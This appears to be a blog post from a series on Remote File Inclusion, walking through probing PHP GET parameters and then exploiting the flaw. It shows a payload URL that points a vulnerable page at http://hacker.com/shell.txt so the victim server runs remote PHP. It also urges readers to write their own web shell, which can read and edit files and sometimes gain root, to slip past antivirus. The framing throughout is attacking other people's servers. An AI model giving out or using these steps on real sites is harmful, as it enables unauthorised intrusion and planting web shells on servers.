Assalam-0-Alaikum,
Completing My Series:
- Beginning of RFI
- Finding And Exploiting RFI vulnerabilities
- Securing RFI vulnerabilities
Find RFI VULNERABILITIES
Here is a few examples of GET arguments manipulating:
www.site.com/index.php?id=1→
www.site.com/index.php?id=1asdfsaf
www.site.com/index.php?id=index→
www.site.com/index.php?id=dumb
www.site.com/index.php?id=h4ck3r
Use your imagination... And for those who did not understand. The arguments does not need to be “id” or “page” or “site”. It can be anything.
There are more advance versions of RFI like POST argument RFI and even cookie RFI and HTTP header RFI and so on. But these should be easy to understand once you gain more knowledge about the HTTP protocol and TCP/IP with HTTP servers and PHP etc.
Exploiting RFI Vulnerabilities
This is a very small but very effective exploit which majority hackers do,
Lets say that you have successfully found a vulnerable page.The URL is: www.site.com/index.php?page=index
The PHP script is made in such a way that we only need to edit page=index to page=http://hacker.com/shell.txt and we now got our PHP code over to the victims server and it executes.
What you should do now is try to make something called a shell. A shell is essentially just a PHP script that can perform Explorer like actions. Like read/write/edit/create files and navigate in folders etc etc. Some shells even got inbuilt exploits to gain root access on the server, but that's another story.
Now, there is a truckload of premade shells out there but I really recommend you creating your own as it is good learning and most shells is actually detected by antiviruses believe it or not. So if the server you are trying to access got a antivirus it will now work and it might perhaps spoil your attack.
So what do you got and what you have it depends on you , :p
I am a pro-programmer of C++ ,php i can crack some softwares and am a web desighner .I AM also on
0 Comments :
Post a Comment
Having Confusion ,oH Dear ask me in comments!!